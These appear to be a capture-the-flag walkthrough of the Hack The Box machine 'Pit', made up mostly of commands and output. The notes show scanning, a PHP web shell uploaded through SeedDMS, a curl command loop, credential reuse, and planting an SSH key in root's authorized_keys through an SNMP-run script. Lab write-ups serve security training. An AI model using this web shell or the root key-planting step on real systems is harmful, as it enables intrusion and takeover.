let's enumerate first:
command: sudo rustscan -a 10.10.10.241
result:
PORT     STATE SERVICE    REASON
22/tcp   open  ssh        syn-ack ttl 63
80/tcp   open  http       syn-ack ttl 63
9090/tcp open  zeus-admin syn-ack ttl 63

command: sudo nmap -sSVC -A -p 22,80,9090 10.10.10.241
result:
PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey: 
|   3072 6fc3408f6950695a57d79c4e7b1b9496 (RSA)
|   256 c26ff8aba12083d160abcf632dc865b7 (ECDSA)
|_  256 6b656ca692e5cc76175a2f9ae750c350 (ED25519)
80/tcp   open  http            nginx 1.14.1
|_http-title: 403 Forbidden
|_http-server-header: nginx/1.14.1
9090/tcp open  ssl/zeus-admin?
| fingerprint-strings: 
|   GetRequest, HTTPOptions: 
|     HTTP/1.1 400 Bad request
|     Content-Type: text/html; charset=utf8
|     Transfer-Encoding: chunked
|     X-DNS-Prefetch-Control: off
|     Referrer-Policy: no-referrer
|     X-Content-Type-Options: nosniff
|     Cross-Origin-Resource-Policy: same-origin
|     <!DOCTYPE html>
|     <html>
|     <head>
|     <title>
|     request
|     </title>
|     <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <style>
|     body {
|     margin: 0;
|     font-family: "RedHatDisplay", "Open Sans", Helvetica, Arial, sans-serif;
|     font-size: 12px;
|     line-height: 1.66666667;
|     color: #333333;
|     background-color: #f5f5f5;
|     border: 0;
|     vertical-align: middle;
|     font-weight: 300;
|_    margin: 0 0 10p
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dms-pit.htb/organizationName=4cd9329523184b0ea52ba0d20a1a6f92/countryName=US
| Subject Alternative Name: DNS:dms-pit.htb, DNS:localhost, IP Address:127.0.0.1
| Not valid before: 2020-04-16T23:29:12
|_Not valid after:  2030-06-04T16:09:12
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9090-TCP:V=7.93%T=SSL%I=7%D=6/28%Time=649C3ED7%P=x86_64-pc-linux-gn
SF:u%r(GetRequest,E70,"HTTP/1\.1\x20400\x20Bad\x20request\r\nContent-Type:
SF:\x20text/html;\x20charset=utf8\r\nTransfer-Encoding:\x20chunked\r\nX-DN
SF:S-Prefetch-Control:\x20off\r\nReferrer-Policy:\x20no-referrer\r\nX-Cont
SF:ent-Type-Options:\x20nosniff\r\nCross-Origin-Resource-Policy:\x20same-o
SF:rigin\r\n\r\n29\r\n<!DOCTYPE\x20html>\n<html>\n<head>\n\x20\x20\x20\x20
SF:<title>\r\nb\r\nBad\x20request\r\nd08\r\n</title>\n\x20\x20\x20\x20<met
SF:a\x20http-equiv=\"Content-Type\"\x20content=\"text/html;\x20charset=utf
SF:-8\">\n\x20\x20\x20\x20<meta\x20name=\"viewport\"\x20content=\"width=de
SF:vice-width,\x20initial-scale=1\.0\">\n\x20\x20\x20\x20<style>\n\tbody\x
SF:20{\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20margin:\x200;\n\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20font-family:\x20\"RedHatDi
SF:splay\",\x20\"Open\x20Sans\",\x20Helvetica,\x20Arial,\x20sans-serif;\n\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20font-size:\x2012px;\n\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20line-height:\x201\.6666666
SF:7;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20color:\x20#333333;\
SF:n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20background-color:\x20#
SF:f5f5f5;\n\x20\x20\x20\x20\x20\x20\x20\x20}\n\x20\x20\x20\x20\x20\x20\x2
SF:0\x20img\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20border:\
SF:x200;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20vertical-align:\
SF:x20middle;\n\x20\x20\x20\x20\x20\x20\x20\x20}\n\x20\x20\x20\x20\x20\x20
SF:\x20\x20h1\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20font-w
SF:eight:\x20300;\n\x20\x20\x20\x20\x20\x20\x20\x20}\n\x20\x20\x20\x20\x20
SF:\x20\x20\x20p\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20mar
SF:gin:\x200\x200\x2010p")%r(HTTPOptions,E70,"HTTP/1\.1\x20400\x20Bad\x20r
SF:equest\r\nContent-Type:\x20text/html;\x20charset=utf8\r\nTransfer-Encod
SF:ing:\x20chunked\r\nX-DNS-Prefetch-Control:\x20off\r\nReferrer-Policy:\x
SF:20no-referrer\r\nX-Content-Type-Options:\x20nosniff\r\nCross-Origin-Res
SF:ource-Policy:\x20same-origin\r\n\r\n29\r\n<!DOCTYPE\x20html>\n<html>\n<
SF:head>\n\x20\x20\x20\x20<title>\r\nb\r\nBad\x20request\r\nd08\r\n</title
SF:>\n\x20\x20\x20\x20<meta\x20http-equiv=\"Content-Type\"\x20content=\"te
SF:xt/html;\x20charset=utf-8\">\n\x20\x20\x20\x20<meta\x20name=\"viewport\
SF:"\x20content=\"width=device-width,\x20initial-scale=1\.0\">\n\x20\x20\x
SF:20\x20<style>\n\tbody\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20margin:\x200;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20fon
SF:t-family:\x20\"RedHatDisplay\",\x20\"Open\x20Sans\",\x20Helvetica,\x20A
SF:rial,\x20sans-serif;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20f
SF:ont-size:\x2012px;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20lin
SF:e-height:\x201\.66666667;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20color:\x20#333333;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0background-color:\x20#f5f5f5;\n\x20\x20\x20\x20\x20\x20\x20\x20}\n\x20
SF:\x20\x20\x20\x20\x20\x20\x20img\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20border:\x200;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20vertical-align:\x20middle;\n\x20\x20\x20\x20\x20\x20\x20\x20}\n\
SF:x20\x20\x20\x20\x20\x20\x20\x20h1\x20{\n\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20font-weight:\x20300;\n\x20\x20\x20\x20\x20\x20\x20\x20
SF:}\n\x20\x20\x20\x20\x20\x20\x20\x20p\x20{\n\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20margin:\x200\x200\x2010p");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.2 - 4.9 (92%), Linux 5.1 (92%), Crestron XPanel control system (90%), Linux 3.18 (89%), Linux 3.16 (89%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

access: http://10.10.10.241/
put this 10.10.10.241 dms-pit.htb to /etc/hosts

command: ./feroxbuster -u http://dms-pit.htb -w /snap/feroxbuster/common/wordlist/raft-medium-directories.txt
result:
404      GET        7l       12w      169c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403      GET        7l       10w      169c http://dms-pit.htb/
403      GET        7l       10w      169c http://dms-pit.htb/config
403      GET        7l       10w      169c http://dms-pit.htb/typo3conf
403      GET        7l       10w      169c http://dms-pit.htb/conf
403      GET        7l       10w      169c http://dms-pit.htb/Config
403      GET        7l       10w      169c http://dms-pit.htb/pear
403      GET        7l       10w      169c http://dms-pit.htb/configs
403      GET        7l       10w      169c http://dms-pit.htb/_config
403      GET        7l       10w      169c http://dms-pit.htb/configuration
403      GET        7l       10w      169c http://dms-pit.htb/confirm
403      GET        7l       10w      169c http://dms-pit.htb/conference
403      GET        7l       10w      169c http://dms-pit.htb/PEAR
403      GET        7l       10w      169c http://dms-pit.htb/App_Config
403      GET        7l       10w      169c http://dms-pit.htb/conferences
403      GET        7l       10w      169c http://dms-pit.htb/config-old
403      GET        7l       10w      169c http://dms-pit.htb/Configuration
403      GET        7l       10w      169c http://dms-pit.htb/disappear
403      GET        7l       10w      169c http://dms-pit.htb/confirmation
403      GET        7l       10w      169c http://dms-pit.htb/CartConfig
403      GET        7l       10w      169c http://dms-pit.htb/configure
403      GET        7l       10w      169c http://dms-pit.htb/webconfig
403      GET        7l       10w      169c http://dms-pit.htb/Conf
403      GET        7l       10w      169c http://dms-pit.htb/CommConfig
403      GET        7l       10w      169c http://dms-pit.htb/Configs
403      GET        7l       10w      169c http://dms-pit.htb/configurator
403      GET        7l       10w      169c http://dms-pit.htb/Conference
403      GET        7l       10w      169c http://dms-pit.htb/_conf
403      GET        7l       10w      169c http://dms-pit.htb/_configs
403      GET        7l       10w      169c http://dms-pit.htb/sbconf
403      GET        7l       10w      169c http://dms-pit.htb/site-config
403      GET        7l       10w      169c http://dms-pit.htb/confidential
403      GET        7l       10w      169c http://dms-pit.htb/disappearing
403      GET        7l       10w      169c http://dms-pit.htb/esw_config
403      GET        7l       10w      169c http://dms-pit.htb/SiteConfig
403      GET        7l       10w      169c http://dms-pit.htb/hsconfig
403      GET        7l       10w      169c http://dms-pit.htb/templates_conf
403      GET        7l       10w      169c http://dms-pit.htb/ConfigFiles
403      GET        7l       10w      169c http://dms-pit.htb/Conferences
403      GET        7l       10w      169c http://dms-pit.htb/SlurpConfirm404
403      GET        7l       10w      169c http://dms-pit.htb/app_config
403      GET        7l       10w      169c http://dms-pit.htb/configurazione
403      GET        7l       10w      169c http://dms-pit.htb/confarc
403      GET        7l       10w      169c http://dms-pit.htb/config_paybox
403      GET        7l       10w      169c http://dms-pit.htb/myconfigs
403      GET        7l       10w      169c http://dms-pit.htb/scriptconf
403      GET        7l       10w      169c http://dms-pit.htb/wp-config
403      GET        7l       10w      169c http://dms-pit.htb/confetti-brides
403      GET        7l       10w      169c http://dms-pit.htb/_confirm
403      GET        7l       10w      169c http://dms-pit.htb/_vti_conf
403      GET        7l       10w      169c http://dms-pit.htb/aaa-config
403      GET        7l       10w      169c http://dms-pit.htb/appearances
403      GET        7l       10w      169c http://dms-pit.htb/autoconfig
403      GET        7l       10w      169c http://dms-pit.htb/confirmations
403      GET        7l       10w      169c http://dms-pit.htb/confirmare
403      GET        7l       10w      169c http://dms-pit.htb/contacts_confirm
403      GET        7l       10w      169c http://dms-pit.htb/ip_configs
403      GET        7l       10w      169c http://dms-pit.htb/pearl
403      GET        7l       10w      169c http://dms-pit.htb/BVConfigure
403      GET        7l       10w      169c http://dms-pit.htb/Confirmation
403      GET        7l       10w      169c http://dms-pit.htb/Confirmations
403      GET        7l       10w      169c http://dms-pit.htb/add-new-confirm
403      GET        7l       10w      169c http://dms-pit.htb/confridin
403      GET        7l       10w      169c http://dms-pit.htb/cal_config
403      GET        7l       10w      169c http://dms-pit.htb/confidence
403      GET        7l       10w      169c http://dms-pit.htb/configurations
403      GET        7l       10w      169c http://dms-pit.htb/conferma-email
403      GET        7l       10w      169c http://dms-pit.htb/confirm_email
403      GET        7l       10w      169c http://dms-pit.htb/conflict
403      GET        7l       10w      169c http://dms-pit.htb/confluence
403      GET        7l       10w      169c http://dms-pit.htb/tsconfig
403      GET        7l       10w      169c http://dms-pit.htb/nametags_conf
403      GET        7l       10w      169c http://dms-pit.htb/pearls
403      GET        7l       10w      169c http://dms-pit.htb/pear_packages
403      GET        7l       10w      169c http://dms-pit.htb/ppmconfig
403      GET        7l       10w      169c http://dms-pit.htb/theconfi
[####################] - 18s    30000/30000   0s      found:75      errors:0      
[####################] - 18s    30000/30000   1677/s  http://dms-pit.htb/  

access: https://10.10.10.241:9090/

command: snmpwalk -v1 -c public 10.10.10.241 . > snmpwalk-full
command: cat snmpwalk-full
take attention:
iso.3.6.1.4.1.2021.9.1.2.1 = STRING: "/"
iso.3.6.1.4.1.2021.9.1.2.2 = STRING: "/var/www/html/seeddms51x/seeddms"
iso.3.6.1.4.1.2021.9.1.3.1 = STRING: "/dev/mapper/cl-root"
iso.3.6.1.4.1.2021.9.1.3.2 = STRING: "/dev/mapper/cl-seeddms"
iso.3.6.1.4.1.2021.9.1.4.1 = INTEGER: 10000
iso.3.6.1.4.1.2021.9.1.4.2 = INTEGER: 100000

access: http://dms-pit.htb/seeddms51x/seeddms/out/out.Login.php?referuri=%2Fseeddms51x%2Fseeddms%2F
user id: michelle
password: michelle

access: http://dms-pit.htb/seeddms51x/seeddms/out/out.ViewDocument.php?documentid=21&showtree=1
access: http://dms-pit.htb/seeddms51x/seeddms/out/out.ViewFolder.php?folderid=8&showtree=1
add document
access: http://dms-pit.htb/seeddms51x/seeddms/out/out.AddDocument.php?folderid=8&showtree=1

create shell.php with this code:
<?php system($_REQUEST["cmd"]); ?>

access: http://dms-pit.htb/seeddms51x/seeddms/out/out.ViewDocument.php?documentid=29&showtree=1
documentId: 29

access: http://dms-pit.htb/seeddms51x/data/1048576/29/1.php?cmd=id
access: http://dms-pit.htb/seeddms51x/data/1048576/29/1.php?cmd=id
result:
uid=992(nginx) gid=988(nginx) groups=988(nginx) context=system_u:system_r:httpd_t:s0 

command: curl http://dms-pit.htb/seeddms51x/data/1048576/30/1.php?cmd=id
result:
uid=992(nginx) gid=988(nginx) groups=988(nginx) context=system_u:system_r:httpd_t:s0

command: curl -G http://dms-pit.htb/seeddms51x/data/1048576/30/1.php --data-urlencode 'cmd=cat ../../../conf/settings.xml'

while :; do read -p "> " cmd; curl -G http://dms-pit.htb/seeddms51x/data/1048576/29/1.php --data-urlencode "cmd=$cmd 2>&1"; done
while :; do read -p "> " cmd; curl -G http://dms-pit.htb/seeddms51x/data/1048576/29/1.php --data-urlencode "cmd=$cmd 2>&1"; done

curl http://dms-pit.htb/seeddms51x/data/1048576/29/1.php?cmd=id

command: curl -G http://dms-pit.htb/seeddms51x/data/1048576/30/1.php --data-urlencode "cmd=cat ../../../conf/settings.xml"
result:
<database dbDriver="mysql" dbHostname="localhost" dbDatabase="seeddms" dbUser="seeddms" dbPass="ied^ieY6xoquu" doNotCheckVersion="false">
    </database>

access: https://10.10.10.241:9090/
let's login 
username: michelle
password: ied^ieY6xoquu

access: https://10.10.10.241:9090/system/terminal
command: cat user.txt 
b69c917cfb661686e6030c2e9397c6bc

command: ps auxww
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.1  0.3 245444 14296 ?        Ss   09:59   0:03 /usr/lib/systemd/systemd --switched-root --system --deserialize 17
michelle    2445  0.0  0.0  27404   524 ?        Ss   10:53   0:00 /usr/bin/ssh-agent
michelle    2448  0.0  0.2  93904  9800 ?        Ss   10:53   0:00 /usr/lib/systemd/systemd --user
michelle    2451  0.0  0.1 314760  5080 ?        S    10:53   0:00 (sd-pam)
michelle    2458  0.7  0.4 494692 17772 ?        Rl   10:53   0:00 cockpit-bridge
michelle    2645  0.0  0.0  24100  3900 pts/0    Ss   10:54   0:00 /bin/bash
michelle    2888  0.0  0.0  58696  4008 pts/0    R+   10:55   0:00 ps auxww

command: which monitor
/usr/bin/which: no monitor in (/home/michelle/.local/bin:/home/michelle/bin:/home/michelle/.local/bin:/home/michelle/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin)

command: file /usr/bin/monitor 
/usr/bin/monitor: Bourne-Again shell script, ASCII text executable

command: ls -ld /usr/local/monitoring/
drwxrwx---+ 2 root root 101 Jun 28 10:55 /usr/local/monitoring/

command: getfacl /usr/local/monitoring/
getfacl: Removing leading '/' from absolute path names
# file: usr/local/monitoring/
# owner: root
# group: root
user::rwx
user:michelle:-wx
group::rwx
mask::rwx
other::---

command: cd /usr/local/monitoring/
command: echo 'ping -c 1 10.10.16.19' > check_0xdf.sh

command: echo 'echo "your_public_key" | tee /root/.ssh/authorized_keys && echo "it worked!"' > check_0xdf.sh
command: snmpwalk -v 2c -c public 10.10.10.241 1.3.6.1.4.1.8072.1.3.2
take attention:
iso.3.6.1.4.1.8072.1.3.2.4.1.2.6.109.101.109.111.114.121.3 = STRING: "Swap:       1961980           0     1961980"
iso.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.1 = STRING: "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQC9Ad16VdWJkStlEV+Rvh8v3NfegFnIW3mgi+LoBtvqqa20XusLIMmbP0z7MuwfDjpnEtBo76izt9JJAUvtrfk5mrzaKVmvAXZuOyGUHSPV+vvU8CJvHwiOwg9WbG/0LQJMh6uM+Zg/qoRg0aeGZ8nm2zBVpkU8dAbFPV0ExTgakndH1NA8R34M7H6Oqa4DGwaHp3IjxrVEGU3EjsMe6k5kYDOhmZc3NyzLq1UoNM7y9O4Ne1t5TFrkr9/lFXOd8gxVHJL5bsUY8/GtYqihksLWJdhj2sgs6sax83Qtd8kMXOQW/so6U6jlms+6JeOHf3lxs+vFOq56Gyu4EikqrULdpATlJdiN+D5vY8lpzo93rXN5GjXwQofxcb82oxb2yh6jzf/gUJDox4XI3mQCM9zzkotoOTeN642xNrtMTqx09oGtxVFFAZnxi/zb9rhs/L6P3a1C5pKEyEV9wNDRotGUkXlw0EyTD0oxNE3ADM49sS291aYxL7QdsnRQxi2tEMT1GUkdUmM6y1T0MUnmfoa/5jaEhfIrJaHZlvhP3FlCClqhSxc7460At9ZOkqlibgspeYb3vj/t+9pkTlQj5F+oKV0Nit5tFGYrOAHbjYv6A6NDa7PDrgcM+WE+3zyIecEu4KSfbCuh2OyOpyk73BgHolyuiPweTenUtt5tentb4Q== root@kali.com"
iso.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.2 = STRING: "it worked!"
iso.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.3 = STRING: "Database status"
iso.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.4 = STRING: "OK - Connection to database successful."
iso.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.5 = STRING: "System release info"
iso.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.6 = STRING: "CentOS Linux release 8.3.2011"
iso.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.7 = STRING: "SELinux Settings"
iso.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.8 = STRING: "user"

command: ssh -i id_rsa_new root@10.10.10.241
command: cat root.txt 
55f3dea024ba8ea5b58c7ee54d08ff17

resource:
https://0xdf.gitlab.io/2021/09/25/htb-pit.html#shell-as-root
https://www.secjuice.com/htb-pit-walkthrough/